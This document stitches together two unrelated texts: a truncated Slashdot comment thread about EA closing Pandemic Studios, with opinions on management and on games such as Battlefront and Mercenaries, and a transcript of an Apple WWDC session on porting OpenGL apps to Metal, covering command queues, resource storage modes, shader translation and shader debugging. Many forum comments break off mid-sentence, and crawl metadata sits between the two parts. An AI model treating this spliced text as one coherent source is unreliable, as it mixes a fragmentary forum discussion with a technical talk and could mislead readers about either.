Bad management is the cause of so many corporate failures, it amazes me that those with a business degree are not flagged by GOOD company founders to be automatically denied employment. I am serious here, we saw this back in the late 1990s when you had a ton of non-technical people being placed as vice presidents of technical companies, and look at how many of them have crashed since then. Even the whole
.com meltdown was caused by too many technical companies being founded by non-technical people with
Re: (Score:2)
Your story is very familiar. Almost every day, a big company buys a little company thinking that a successful small business can become a blockbuster big business with a little infusion of capital and other resources. Some companies know how to pull this off, but it usually seems to fail, both because of the scaling issues you describe and because of the clash of management cultures between the two entities.
I used to work at Sun, and that company made one disastrous acquisition after another. The last one w
Every time they do this... (Score:1)
EA reminds me of something (Score:2, Funny)
Re: (Score:2, Interesting)
The Star Wars Battlefront PC games were pretty good. The console ports were decent too.?.
Re: (Score:2)
command and conquer. Though I'd say a better comparison would be how many people are willing to buy the game today, vs how much effort the community has put into the game.
Re: (Score:2)
Re: (Score:2)
Me and a group of my buddies who were big fans of the Battlezone were actually quite disappointed with the Battlezone 2. The game mechanics and the general feel of the game (not to mention very awkward controls - specially on tracked vehicles) resulted with the game flopping with most of the players of the Activisions' original re-make.
And as to the following, many games have hard-core addicts who try to keep them alive long past the "best before" date. Even the original Battlezone still has servers runnin
Re: (Score:2, Interesting)
You...are...so...wrong
Destroy All Humans 1 & 2 is damn good game series.
Mercenaries 1 & 2 is also a good games.
Re: (Score:2)
Mercenaries 2 is filed under "Shit, Complete & Total"
It was just another shitty GTA rip-off with uninspired weapons, boring vehicles, a plot that made 30 Days of Night look good, and actually forced you to be a nearly-decent human being (killing innocent civilians has repercussions beyond drawing the attention of enemy forces? lamesauce) instead of a psychotic murdering rapist.
Oh, and the hardest thing in the whole game was not losing the will to live after pressing over 9000 buttons in the same lameass
Re: (Score:2, Interesting)
Re: (Score:2)
Star Wars: Battlefront 1 & 2 says you are wrong.
Re:
Re: (Score:3, Interesting)
Yeah, that's basically my experience with them. I still install & play the first one sometimes, mostly to play single-player with bots and do Hoth over and over, or to play the galactic conquest mode or whatever it's called. It's not a great game, but come on, Hoth!
II was terrible, though. Maybe it's better multiplayer?
Re: (Score:2)
Re: (Score:1, Interesting)
|
https://games.slashdot.org/story/09/11/20/0440236/ea-shuts-down-pandemic-studios-cuts-200-jobs?sdsrc=prevbtmprev
|
CC-MAIN-2018-22
|
refinedweb
| 3,946
| 69.82
|
UR::Manual::Tutorial - Step-by-step guide to building a set of classes for a simple database schema
We'll use the familiar "Music Database" example used in many ORM tutorials:
Our database has the following basic entities and relationships:
The tool for working with UR from the command line is 'ur' . It is installed with the UR module suite.
Just type "ur" and hit enter, to see a list of valid ur commands: > ur Sub-commands for ur: init NAMESPACE [DB] initialize a new UR app in one command define ... define namespaces, data sources and classes describe CLASSES-OR-MODULES show class properties, relationships, meta-data update ... update parts of the source tree of a UR namespace list ... list objects, classes, modules sys ... service launchers test ... tools for testing and debugging
The "ur" command works a lot like the "svn" command: it is the entry point for a list of other subordinate commands.
> ur define Sub-commands for ur define: namespace NSNAME create a new namespace tree and top-level module db URI NAME add a data source to the current namespace class --extends=? [NAMES] Add one or more classes to the current namespace
At any point, you can put '--help' as a command line argument and get some (hopefully) helpful documentation.
In many cases, the output also resembles svn's output where the first column is a character like 'A' to represent something being added, 'D' for deleted, etc.
(NOTE: The "ur" command, uses the Command API, an API for objects which follow the command-pattern. See UR::Command for more details on writing tools like this.
A UR namespace is the top-level object that represents your data's class structure in the most general way. For this new project, we'll need to create a new namespace, perhaps within a testing directory.
ur define namespace Music
And you should see output like this:
A Music (UR::Namespace) A Music::Vocabulary (UR::Vocabulary) A Music::DataSource::Meta (UR::DataSource::Meta) A Music/DataSource/Meta.sqlite3-dump (Metadata DB skeleton)
showing that it created 3 classes for you, Music, Music::Vocabulary and Music::DataSource::Meta, and shows what classes those inherit from. In addition, it has also created a file to hold your metadata. Other parts of the documentation give a more thorough description of Vocabulary and Metadata classes.
A UR DataSource is an object representing the location of your data. It's roughly analogous to a Schema class in DBIx::Class, or the "Base class" in Class::DBI.
Note: Because UR can be used with objects which do NOT live in a database, using a data source is optional, but is the most common case.
Most ur commands operate in the context of a Namespace, including the one to create a datasource, so you need to be within the Music's Namespace's directory:
cd Music
and then define the datasource. We specify the data source's type as a sub-command, and the name with the --dsname argument. For this example, we'll use a brand new SQLite database. For some other, perhaps already existing database, give its connect string instead.
ur define db dbi:SQLite:/var/lib/music.sqlite3 Example
which generates this output:
A Music::DataSource::Example (UR::DataSource::SQLite,UR::Singleton) ...connecting... ....ok
and creates a symlink to the database at: Music/DataSource/Example.sqlite3
and shows that it created a class for your data source called Music::DataSource::Example, which inherits from UR::DataSource::SQLite. It also created an empty database file and connected to it to confirm that everything is OK.
Here are the table creation statements for our example database. Put them into a file with your favorite editor and call it example-db.schema.txt:
CREATE TABLE artist ( artist_id INTEGER NOT NULL PRIMARY KEY, name TEXT NOT NULL ); CREATE TABLE cd ( cd_id INTEGER NOT NULL PRIMARY KEY, artist_id INTEGER NOT NULL CONSTRAINT CD_ARTIST_FK REFERENCES artist(artist_id), title TEXT NOT NULL, year INTEGER ); CREATE TABLE track ( track_id INTEGER NOT NULL PRIMARY KEY, cd_id INTEGER NOT NULL CONSTRAINT TRACK_CD_FK REFERENCES cd(cd_id), title TEXT NOT NULL );
This new SQLite data source assumes the database file will have the pathname Music/DataSource/Example.sqlite3. You can populate the database schema like this:
sqlite3 DataSource/Example.sqlite3 < example-db.schema.txt
Now we're ready to create the classes that will store your data in the database.
You could write those classes by hand, but it's easiest to start with an autogenerated group built from the database schema:
ur update classes-from-db
is the command that performs all the magic. You'll see it go through several steps:
There will now be a Perl module for each database table. For example, in Cd.pm:
package Music::Cd; use strict; use warnings; use Music; class Music::Cd { table_name => 'CD', id_by => [ cd_id => { is => 'INTEGER' }, ], has => [ artist => { is => 'Music::Artist', id_by => 'artist_id', constraint_name => 'CD_ARTIST_FK' }, artist_id => { is => 'INTEGER' }, title => { is => 'TEXT' }, year => { is => 'INTEGER', is_optional => 1 }, ], schema_name => 'Example', data_source => 'Music::DataSource::Example', }; 1;
The first few lines are what you would see in any Perl module. The keyword
class tells the UR system to define a new class, and lists the properties of the new class. Some of the important parts are that instances of this class come from the Music::DataSource::Example datasource, in the table 'CD'. This class has 4 direct properties (cd_id, artist_id, title and year), and one indirect property (artist). Instances are identified by the cd_id property.
Methods are automatically created to match the property names. If you have an instance of a CD, say $cd, you can get the value of the title with
$cd->title. To get back the artist object that is related to that CD,
$cd->artist.
Creating new object instances is done with the create method; its arguments are key-value pairs of properties and their values.
#!/usr/bin/perl use strict; use Music; my $obj1 = Music::Artist->create(name => 'Elvis'); my $obj2 = Music::Artist->create(name => 'The Beatles'); UR::Context->commit();
And that's it. After this script runs, there will be 2 rows in the Artist table.
Just a short aside about that last line... All the changes to your objects while the program runs (creates, updates, deletes) exist only in memory. The current "Context" manages that knowledge. Those changes are finally pushed out to the underlying data sources with that last line.
Retrieving object instances from the database is done with the
get() method. A
get() with no arguments will return a list of all the objects in the table.
@all_cds = Music::Cd->get();
If you know the "id" (primary key) value of the objects you're interested in, you can pass that "id" value as a single argument to get:
$cd = Music::Cd->get(3);
An arrayref of identity values can be passed-in as well. Note that if you query is going to return more than one item, and it is called in scalar context, it will generate an exception.
@some_cds = Music::Cd->get([1, 2, 4]);
To filter the return list by a property other than the ID property, give a list of key-value pairs:
@some_cds = Music::Cd->get(artist_id => 3);
This will return all the CDs with the artist ID 5, 6 or 10.
@some_cds = Music::Cd->get(artist_id => [5, 6, 10]);
get() filters support operators other than strict equality. This will return a list of CDs with artist ID 2 and have the word 'Ticket' somewhere in the title.
@some_cds = Music::Cd->get(artist_id=> 2, title => { operator => 'like', value => '%Ticket%'} );
To search for NULL fields, use undef as the value:
@cds_with_no_year = Music::Cd->get(year => undef);
get_or_create() is used to retrieve an instance from the database if it exists, or create a new one if it does not.
$possibly_new = Music::Artist->get_or_create(name => 'The Band');
All the properties of an object are also mutators. To change the object's property, just call the method for that property with the new value.
$cd->year(1990);
Remember that any changes made while the program runs are not saved in the database until you commit the changes with
UR::Context->commit.
The
delete() method does just what it says.
@all_tracks = Music::Track->get(); foreach my $track ( @all_tracks ) { $track->delete(); }
Again, the corresponding database rows will not be removed until you commit.
After running ur update classes, it will automatically create indirect properties for all the foreign keys defined in the schema, but not for the reverse relationships. You can add other relationships in yourself and they will persist even after you run ur update classes again. For example, there is a foreign key that forces a track to be related to one CD. If you edit the file Cd.pm, you can define a relationship so that CDs can have many tracks:
class Music::Cd { table_name => 'CD', id_by => [ cd_id => { is => 'INTEGER' }, ], has => [ artist => { is => 'Music::Artist', id_by => 'artist_id', constraint_name => 'CD_ARTIST_FK' }, artist_id => { is => 'INTEGER' }, title => { is => 'TEXT' }, year => { is => 'INTEGER' }, tracks => { is => 'Music::Track', reverse_as => 'cd', is_many => 1 }, # This is the new line ], schema_name => 'Example', data_source => 'Music::DataSource::Example', };
This tells the system that there is a new property called 'tracks' which returns items of the class Music::Track. It links them to the acting CD object through the Track's cd property.
After that is in place, you can ask for a list of all the tracks belonging to a CD with the line
@tracks = $cd->tracks()
You can also define indirect relationships through other indirect relationships. For example, if you edit Artist.pm to add a couple of lines:
class Music::Artist { table_name => 'ARTIST', id_by => [ artist_id => { is => 'INTEGER' }, ], has => [ name => { is => 'TEXT' }, cds => { is => 'Music::Cd', reverse_as => 'artist', is_many => 1 }, tracks => { is => 'Music::Track', via => 'cds', to => 'tracks', is_many => 1}, ], schema_name => 'Example', data_source => 'Music::DataSource::Example', };
This defines a relationship 'cds' to return all the CDs from the acting artist. It also defines a relationship called 'tracks' that will, behind the scenes, first look up all the CDs from the acting artist, and then find and return all the tracks from those CDs.
Additional arguments can be passed to these indirect accessors to get a subset of the data
@cds_in_1990s = $artist->cds(year => { operator => 'between', value => [1990,1999] } );
would get all the CDs from that artist where the year is between 1990 and 1999, inclusive.
Note that is_many relationships should always be named with plural words. The system will auto-create other accessors based on the singular name for adding and removing items in the relationship. For example:
$artist->add_cd(year => 1998, title => 'Cool Jams' );
would create a new Music::Cd object with the given year and title. The cd_id will be autogenerated by the system, and the artist_id will be automatically set to the artist_id of $artist.
It's possible to use get() with custom SQL to retrieve objects, as long as the select clause includes all the ID properties of the class. To find Artist objects that have no CDs, you might do this:
my @artists_with_no_cds = Music::Artist->get(sql => 'select artist.artist_id, count(cd.artist_id) from artist left join cd on cd.artist_id = artist.artist_id group by artist.artist_id having count(cd.artist_id) = 0' );
|
http://search.cpan.org/~sakoht/UR-0.38/lib/UR/Manual/Tutorial.pod
|
CC-MAIN-2015-48
|
refinedweb
| 1,868
| 60.04
|
odbx_row_fetch man page
odbx_row_fetch — Retrieve rows from the result set
Synopsis
#include <opendbx/api.h>
int odbx_row_fetch
(odbx_result_t* result);
Description
Retrieves the values of a row from the current result set returned by odbx_result(). Until this function is invoked, no row and field data is available via odbx_field_length() or odbx_field_value() and these functions will return zero respectively NULL.
Moreover, it is necessary to fetch all rows from a result set until zero is returned indicating that no more rows are available. Otherwise - depending on the backend - an error may occur after calling odbx_result() the next time or the outstanding rows will be returned within the next result.
odbx_row_fetch() requires a valid
result object which was created by odbx_result(). It must not have been feed to odbx_result_finish() before.
Return Value
odbx_row_fetch() will return
ODBX_ROW_NEXT ("1") as long as rows are available from the result set. After the last row has been made available, further calls to this function will return
ODBX_ROW_DONE ("0") indicating that the result set doesn't contain more rows. The named constants are available since OpenDBX 1.3.2 and the numbers in brackets have to be used instead if a previous release is is the basis for the application development.
In case of an error, values less than zero are returned encodeing the reason why the error occurred.
Errors
- -
ODBX_ERR_PARAM
The
resultparameter is either NULL or the object is invalid. This is usually the case if result has been already feed to odbx_result_finish().
See Also
odbx_column_count(), odbx_column_name(), odbx_column_type(), odbx_error(), odbx_error_type(), odbx_field_length(), odbx_field_value(), odbx_result()
|
https://www.mankier.com/3/odbx_row_fetch
|
CC-MAIN-2017-22
|
refinedweb
| 256
| 54.52
|
A simple connector pool for python-ldap.
Project description
A simple connector pool for python-ldap.
The pool
You need python-ldap in order to use this library
Quickstart
To work with the pool, you just need to create it, then use it as a context manager with the connection method:
from ldappool import ConnectionManager cm = ConnectionManager('ldap://localhost') with cm.connection('uid=adminuser,ou=logins,dc=mozilla', 'password') as conn: .. do something with conn ..
The connector returned by connection is a LDAPObject, that’s binded to the server. See for details on how to use a connector.
It is possible to check the state of the pool by representing the pool as a string:
from ldappool import ConnectionManager cm = ConnectionManager('ldap://localhost', size=2) .. do something with cm .. print(cm)
This will result in output similar to this table:
+--------------+-----------+----------+------------------+--------------------+------------------------------+ | Slot (2 max) | Connected | Active | URI | Lifetime (600 max) | Bind DN | +--------------+-----------+----------+------------------+--------------------+------------------------------+ | 1 | connected | inactive | ldap://localhost | 0.00496101379395 | uid=tuser,dc=example,dc=test | | 2 | connected | inactive | ldap://localhost | 0.00532603263855 | uid=tuser,dc=example,dc=test | +--------------+-----------+----------+------------------+--------------------+------------------------------+
ConnectionManager options
Here are the options you can use when instanciating the pool:
uri: ldap server uri [mandatory]
bind: default bind that will be used to bind a connector. default: None
passwd: default password that will be used to bind a connector. default: None
size: pool size. default: 10
retry_max: number of attempts when a server is down. default: 3
retry_delay: delay in seconds before a retry. default: .1
use_tls: activate TLS when connecting. default: False
timeout: connector timeout. default: -1
use_pool: activates the pool. If False, will recreate a connector each time. default: True
The uri option will accept a comma or whitespace separated list of LDAP server URIs to allow for failover behavior when connection errors are encountered. Connections will be attempted against the servers in order, with retry_max attempts per URI before failing over to the next server.
The connection method takes two options:
bind: bind used to connect. If None, uses the pool default’s. default: None
passwd: password used to connect. If None, uses the pool default’s. default: None
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
|
https://pypi.org/project/ldappool/
|
CC-MAIN-2022-40
|
refinedweb
| 381
| 58.89
|
More Videos
Streaming is available in most browsers,
and in the WWDC app.
Bringing OpenGL Apps to Metal
Metal is the modern foundation for GPU-accelerated graphics and compute on Apple platforms, superseding OpenGL, OpenGL ES, and OpenCL. Get introduced to the architecture and feature set of Metal and learn a step-by-step approach for transitioning OpenGL-based apps to the Metal API.
Resources
Related Videos
WWDC 2019
- Download
Lionel Lemarie: Hi, folks.
Welcome to our Metal session. I'm Lionel. I'm in the GPU software performance team here at Apple. And with my friends Max and Sarah, we'll be guiding you through how to bring your OpenGL app to Metal. So last year we announced that OpenGL, OpenGL ES, and OpenCL are deprecated. They will continue to be supported in iOS 13 and macOS Catalina, but now is the time to move.
New projects should target Metal from their inception. But if you have an OpenGL app that you want to port to Metal, you've come to the right place. So we first introduced Metal in 2014 as our new low-overhead, high-efficiency, high-performance GPU programming API. Over the past five years, Apple's core frameworks have adopted Metal and they're getting really great results. If your application is built on top of layers like SpriteKit, SceneKit, RealityKit, Core Image, Core Animation, then you're already using Metal. We've also been working closely with vendors on engines like Unity, Unreal Engine 4, and Lumberyard to really take advantage of Metal.
If you're using one of these engines, you're already up to speed.
But if you've built your own renderer, then Metal gives you a lot of great benefits.
Metal combines the graphics of OpenGL and compute of OpenCL into a unified API.
It allows you to use multithread rendering in your application. Whenever there are CPU operations that need to take place that are expensive, we made sure that they happen as infrequently as possible to reduce overhead during your app's execution.
Metal's shading language is C++ based and all the shaders used in your application can be precompiled, making it easier to have a wide variety of material shaders, for example.
And last but not least, we have a full suite of debugging and optimization tools built right into Xcode. So once you have ported to Metal, you have full support to make your application even better. So let's dive in.
In this session we'll take a look at the different steps involved in migrating from GL into Metal, and we'll do that by comparing a typical GL app to a Metal app.
As an overview, let's quickly look through the steps of our GL app.
First, you set up a window that you'll use for rendering. Then you create your resources like buffers, textures, samplers. You implement all your shaders written in GLSL. Before you can render anything in GL, you may have to create certain object states, such as GL programs, GL frame buffer objects, vertex array objects.
So once you've initialized your resources, the render loop starts and you draw your frames.
For each frame, you start by updating your resources, bind a specific frame buffer, set the graphic state, and make your draw calls. You repeat this process for each frame buffer you have. You may have shadow maps, a lighting pass, some post-processing. So potentially quite a few render passes.
And then finally, you present the final rendered image. It's pretty easy.
And as you can see, the Metal flow looks very similar. We updated some of the original concepts and introduced a few new things. But overall, the flow is much the same. It's not a complete rewrite of the engine; it works in the same manner. So we will reintroduce the new concepts while drawing parallels between GL and Metal, comparing and contrasting the two API's to help you successfully make the transition. When you're walking through any tutorial on graphics, then the first thing you learn is how to create and draw to a window. So let's start with the window subsystem. Both GL and Metal have this concept, but it's accomplished a little differently. The application is required to set up and present a drawing surface. And view and view delegates manage the interface between the API and the underlying window system. You might be using these frameworks to manage your GL views, so we have equivalent frameworks in Metal.
NSOpenGLView and GLKView map to MTKView. And if you are using Core Animation in your application with the EAGLLayer, then there's an equivalent CAMetalLayer.
As an example, let's say you are using GLKView. It has a single entry point with the draw rate. So you need it to check if the resolution of your target is unchanged since the last frame, update your render target sizes as needed, right from within the render loop. In MetalKit, it's a bit updated. There's a separate function for whenever the drawable needs to change, such as when you're rotating the screen or resizing your window. So you don't need to check if your resources need to be reallocated inside your draw function; it's dedicated to render code.
If you need additional flexibility, we provide the CAMetalLayer, which you use as the backing layer for your view. While the CAEAGLLayer defined the properties of your drawable such as its color format, the CAMetalLayer allows you to set up your drawable size, pixel format, color space, and more. Importantly, the CAMetalLayer maintains a pool of textures and you call next drawable to get the drawable to render your frame to.
It's an important concept that we'll revisit in a short while when it's time to present.
So now we have a window. Next we're going to introduce some new concepts in Metal.
So the command queues, command buffers, command encoders. These objects work together in Metal to submit work to the GPU. They're new because the underlying glContexts managed the submission for you. GL is an implicit API, meaning that there is no code that tells GL when to schedule the work. As a developer, you have very little control about when graphics work really happens, such as when shaders are compiled, when resource storage is allocated, when validation occurs, or when work is actually submitted to the GPU.
The glContext is a big [state] machine, and a typical workflow would look like this. Your application creates a glContext, sets it on the thread, and then calls arbitrary GL comments. The comments are recorded by the context under the hood and would get executed at some point in time.
Let's take a closer look to see what actually goes on. Say your application just send GL these calls, a few state changes, a few draw calls. In a perfect scenario, the context would translate this into GPU comments to fill up an internal buffer.
And then when it's full, it would send it to the GPU. If you insert a glFlush to enforce execution, you know for sure they'll be kicked off by that point.
But actually, the GPU could start execution at any point beforehand.
Alright. So, for example, if we change one draw call introducing every dependency, suddenly execution is kicked off at that point and you could experience massive stalls. So, again, when does work actually get submitted? It depends. And that was one of the downsides of OpenGL -- wasn't consistent in performance. Any one small change could force you down a bad path.
Metal, on the other hand, is an explicit API, meaning the application gets to decide exactly what work goes to the GPU and when. Metal splits the concept of a glContext into a collection of internal working objects. The first object an app creates is a Metal device object, which is just an abstract representation of the GPU.
Then it creates a key object called a Metal command queue. The Metal command queue maintains the order of commands sent to the GPU by allocating command buffers to fill.
And a command buffer is simply a list of GPU commands your app will fill to send to the GPU for execution. So we saw this command buffer concept in GL -- in the GL example we just studied. Let's work with that command buffer from this point on.
But an app doesn't write the commands directly to the command buffer; instead, it creates a Metal command encoder. Let's look at the main three types of encoders.
First one we'll use will be filled with blit commands that are used to copy resources around. The command encoder translates API codes into GPU instructions and then writes them to the command buffer. After a series of commands have been encoded, for example, series of blits to copy resources, then your app will end encoding, which releases the encoder object. Additionally, Metal supports a compute encoder for parallel work that you would normally have done in OpenCL before.
You enqueue a number of kernels that get written to the command buffer and you run the encoder to release it. Lastly, let's use a render encoder for your familiar rendering commands. You enqueue your state changes and your draw calls and end the encoder. So here we have a command buffer full of different workloads, but the GPU hasn't done any work yet. Metal has created the objects and encoded commands all within the CPU. It's only after your application has finished encoding comments and explicitly committed the command buffer that the GPU begins to work and executes those commands. So now that we have encoded commands, let's now compare and contrast GL and Metal's command submissions.
In GL there's no direct control of when work gets submitted to the GPU -- you rely on big hammers like glFlush and glFinish to ensure code execution; glFlush submits the commands and poses the CPU threads until they're scheduled, and glFinish poses the CPU thread until the GPU is completely finished. Work can still get submitted at any time before these commands happen, introducing potential stalls and slowdowns.
And Metal has equivalent versions of these functions; you can still explicitly commit and wait for a command buffer to be scheduled or completed. But these wait commands are not recommended unless you absolutely need them. Instead, we suggest that you simply commit your command buffer and then add a callback so that your application can be notified later when the command buffer has been completed on the GPU.
This frees your CPU to continue doing other work. So now that we have reviewed command queue, command buffer, command encoder, let's move on and talk about resource creation. There are three main types of resources that any graphic app is likely to use: Buffers, textures, and samplers. Let's take a look at buffers first. In GL, you have a buffer object and the memory associated with it. The API codes you use can modify the object state, the memory, or both together. So here, for example, glBufferData can be used to modify both the memory and the state of the object. The buffer dimensions can be modified again later by calling glBufferData, in which case the old object and its contents will be discarded internally by OpenGL. In Metal, the API to create and fill a buffer looks very similar, but the main difference lies in the fact that the produced subject is immutable. If at any point you need to resize the buffer, you simply need to create a new one and discard the old one. Both OpenGL and Metal have ways to indicate how you intend to use an object; however, in GL the enum is simply a usage hint about how the data in a buffer object would be accessed. The driver uses that hint to decide where to base the locate memory for the buffer, but there's no direct control over storage. OpenGL ultimately decides where to store the objects.
In Metal, the API allows you to specify a storage mode which maps to a specific memory allocation behavior. Metal gives you control, since you know best how your objects are going to be used. It's an important concept in an object creation, so we'll come back to it in a short moment right after we look at texture API's.
In GL, each texture has an internal sampler object, an app's commonly set up sampling mode through that sampler. But you also have the option to create a separate sampler object outside of your texture. Here's an example for creating and binding your texture, setting up your sampler, and then finally filling in the data.
One thing worth mentioning is that GL has a lot of API calls to create initialized textures with data. It also has what are called named resource versions of the same API. There's even more API's when it comes to managing samplers.
The list just goes on and on. One of the design goals with Metal was to give a simpler API that would maintain all of the flexibility. So in Metal, texture and sampler objects are always separate and immutable after creation. To create a texture, we create a descriptor, set various properties to define texture dimensions like pixelFormat and sizes, amongst others. Again, an important property we said is the storage mode to specify where in memory to store the texture. And finally, we use that descriptor to create an immutable object. In a similar fashion, you start with a sampler descriptor, set its properties, and create the immutable sampler object.
It's pretty easy. To fill a texture's image data, we calculate the bytes per row.
And just like we did in OpenGL, we specify the region to load. Then we call the textures replaceRegion method, which copies the data into the texture from a pointer we specify.
Once you load your first texture, you're likely to observe that it's upside down.
That's because in Metal the texture coordinates are flipped on the y-axis compared to GL.
And it's also worth mentioning that Metal API's don't perform any pixelFormat transformation under the hood. So you need to upload your textures in the exact format that you intend to use. Now let's get back to storage modes.
As mentioned, in GL the driver has to make a best guess on how you wanted to use your resources. As a developer, you can provide hints in some cases, like when you created a buffer or by creating render buffer objects for frame buffer attachments.
But in all cases, these were still hints and the implementation details are hidden from you. A few minutes ago, we briefly saw the additional storage mode property Metal that you can set on a texture descriptor and also when creating a buffer.
Let's look at the main use cases for those. Simplest option is to use shared storage mode, which gives both the CPU and GPU access to the resource.
For buffers, this means you get to point here to the memory backing of the object.
For textures on iOS, this means you can call some easy-to-use functions to set and retrieve image data. You can also use a private storage mode, which gives the GPU exclusive access to the data. It allows Metal to apply some optimizations that it wouldn't normally have been able to use if the CPU had access to it.
But only the GPU can directly fill the contents of the data. So you can indirectly fill the data from the CPU by using a blitEncoder from a second intermediate resource that uses shared storage. On the voices with dedicated video memory, setting the resource to use private storage allocates it in video memory only, single copy.
On macOS there's a managed storage mode which allows both the CPU and GPU to access an object's data. And on systems with dedicated video memory, Metal may have to create a second mirrored memory backing for efficient access by both processes.
So because of this, explicit codes are necessary to ensure that your data is synchronized for CPU and GPU access, for example, using didModifyRange. So to recap, we reviewed some of the typical uses for each mode. On macOS you would use the private storage mode for static assets and your render targets. Your small dynamic buffers could use the shared storage mode.
And your larger buffers with small updates would use the managed storage mode.
On iOS, your static data and rendering targets can use the private storage mode.
And since our devices use unified memory, dynamic data of any size can use the shared storage mode and still get great performance. Next, let's talk about developing shaders for your graphics application and what API's you use to work with shaders. When it comes to shader compilation in GL, you have to create a shader object, replace the ShaderSource in the object, make just in time compilation, and verify that the compilation succeeded. And while this workflow has its benefits, your application had to pay the performance costs of compiling all your shaders every time. One of the key ways in which Metal achieves its efficiency is by doing work earlier and less frequently. At build time, Xcode will compile all the Metal ShaderSource files into a default Metal library file and place it in your app bundle for retrieval at runtime. So this removes the need to compile a lot of it at runtime and cuts the compilation time when your application runs in half. All you need to do is create a Metal library from a file bundled with your application and fetch the shader function from it.
In GL you use GLSL, which is based on the C programming language.
The Metal shading language or MSL is based on C++. So it should look reasonably familiar to most GL developers. Its foundation in C++ means that you can create classes, templates, and stretches. You can define enums and namespaces.
And like GLSL, there are built-in vector and matrix types, numerous built-in functions and operations come in and use for graphics. And there are classes to operate on textures that specify sampler state. Like Metal, MSL is also unified for graphics and compute. And finally, since shaders are pre-compiled, Xcode is able to give you errors, warning, and guidance to help you debug at build time.
So let's take a look at actual code for MSL and compare it with GLSL.
We're going to walk through a simple vertex shader, GLSL on top, MSL on the bottom.
Let's start defining our shaders. These are the prototypes.
In GLSL, void main. There's nothing in the shader that specifies the shader stage.
It's purely determined by the shader type passed into the glCreateShader call.
In MSL the shader stage is explicitly specified in the shader code.
Here the vertex qualifier indicates that it will be executed for each vertex generating perfect examples. In GLSL, every shader entry point has to be called main and accept and return void. In MSL each entry point has a distinct name.
And when you're building shaders with Xcode, the compiler can resolve include statement in the preprocessing stage the same it would do for regular C++ code. At runtime you can query functions by their distinct name from the precompiled Metal library.
Then let's talk about inputs. Because each entry point in GLSL is a main function with no argument, all of the inputs are passed as global arguments. This applies to both vertex attributes and uniform variables. In Metal all the inputs to the shaded stage are arguments to the entry function. The double brackets declare C++ attributes. We'll look at them in a second. One of the inputs here that we have is a model view projection matrix. In OpenGL, your application had to be aware of the GLSL names within the C++ code in order to bind data to these variables.
And that made shader development error-prone. In MSL the uniform binding indices are explicitly controlled by the developer within the shader, so an application can bind directly to a specific slot. In the example here, slot number one. The keyword constant here indicates that the intention for the model view projection is to be uniform for all vertices. The other input to the shader is a set of vertex attributes. In GLSL you typically use separate attribute inputs.
The main difference here is that MSL uses a structure of your own design.
The staging keywords suggest that each invocation of the shader will receive its own arguments. Once you have all the inputs to the shaders set up, you can actually perform all the calculations. Then for the outputs, in GLSL the output is split between varying attributes like glTexCoord and predefined variables, in this case gl Position. In MSL, the vertex shader output is combined into your own structure. So we've used a vertex and vertex output structure. Let's scroll up in the MSL code to see what they actually look like. As mentioned previously, GLSL defines the input vertex attributes separately, and Metal allows you to define them within a structure.
In MSL there are a few special keywords for vertex shader input.
We mark each structure member with an attribute keyword and assign an attribute index to it.
Similar to GLSL, these indices are used in the Metal API to assign the vertex buffer streams to your vertex attributes. And GLSL predefines special keywords like GL position to indicate which variable contains vertex coordinates that have been transformed with the model view projection matrix. Similarly, for the vertex output, a structure in MSL, the special keyword position signals that the vertex shader output position is stored in that structure member. Similar to GLSL vector type, MSL defines a number of simd types via the simd.h header that can be shared between your CPU and GPU code.
But there's a few things you need to remember about them. Vector and matrix types in your buffers are aligned to 16 bytes or 8 bytes for half precision. So they're not necessarily packed, for example, a float3 has a size of 12 bytes but is aligned to 16 bytes.
This is to ensure that the data is aligned for optimal CPU and GPU access.
There are specific backed formats you can use if you need them.
But you will need to unpack them in the shader before using them. So we've just reviewed the main differences between GLSL and MSL. And to make this transition smooth and easy, my colleague Max will show you a really cool tool to help you breeze through it. Thank you. Good evening. Metal, it's not just an API and a shading language, it is also a powerful collection of tools. My name is Max, and I'm going to minimize your hassle porting to Metal. Let's take a look at this scene. This is the very first draw call from an old OpenGL demo that we here at Apple also ported to Metal.
It's drawing a model of a temple and a tree, both illuminated by a global light source.
Let's port the fragment shader together. So the very first thing I did, I just copy and pasted my entire old OpenGL code directly into my Metal shader file.
Based on this, I've already created my input structure, as well as my function prototype.
Let's begin. So what we are going to do is just copy and paste the contents of the main function directly into our Metal function. And here we see the very first powerful thing about Metal. Because the shader's precompiled, we are getting errors instantly. Let's take a closer look. Of course, the building vector types have different names now. So vec2 becomes a float2; the vec3 becomes the float3; and the vec4 becomes a float4. So we quickly fix that. The next error we are going to see is that like all of our input structures -- all of our global variables are now coming from our input structure. And because I just used a similar naming scheme, this is also very easy. And, of course, we have to do the exact same thing for our uniforms. The next error is a little bit more complex.
Sampling in Metal is different, so let's take a look. We are going to start from scratch. So we directly can call a sample function on our colorMap.
And here we can see how powerful it is to have full auto completion.
So this function expects us to put in a sampler and a texture coordinate.
We already have the texture coordinate. We could pass in the sampler as an argument to our function or, conveniently in Metal, we can just declare one in code like this. We need to do the exact same thing for our normalMap.
The last error that we are seeing is that we are writing into, like, one of many OpenGL magic variables. Instead, we are just going to return our final computed color.
We can also see that all the other functions, like normalize, dot product, and my favorite function max, are still exactly the same. Our shader now compiled successfully. Let's run it. Something went wrong.
In OpenGL when you're experiencing an error with your shader, what you usually do is, like, you look at your source code, you look at your output, and you think really hard.
We're just going to use the shader debugger instead. Clicking on the little camera icon in the debug area will capture a GPU trace. This is a recording of every Metal API call we made. And we can now navigate to our draw calls.
Here we are drawing the tree. And here we are drawing the temple.
Let me long press on the stairs of the temple to bring up the pixel inspector, which allows us to start the shader debugger. What we are seeing here now is the values per line for the code that we have ported together and for the pixel we have just selected.
Let's take a look at our colorMap first. We can see this looks like a reasonable texture. And we can also see that our stairs are, like, in the upper half of this texture; however, if we were taking a look at our texture coordinate, we can see that we are sampling from the lower half. Let me quickly verify if this is the case. What we are going to do is to invert the y coordinate of our texture. We can now update our shaders -- looks reasonable -- and we can continue our execution. There, much better. This is a pretty common error that you will experience when porting from OpenGL to Metal. And, of course, the real fix is you go into your texture loading code and make sure your texture is loaded at the right origin so you don't have to do this fix in every shader. However, the combination of a feature-rich editor and mighty debugging tools will also help you port in your games to Metal finally. Thank you very much. My colleague Sarah will now guide you through the rest of the slides. Sarah Clawson: Thanks, Max. Hi, I'm Sarah Clawson. And I'm here to take you through the rest of the port from GL to Metal. So far in the life of a graphics app, we've gone through a lot of setup. We've got a window to render to, a way to get your commands to the GPU, and a set of resources and shaders ready to go.
Next up, we're going to talk about setting up the state for your render loop.
OpenGL has several key concepts when it comes to state management.
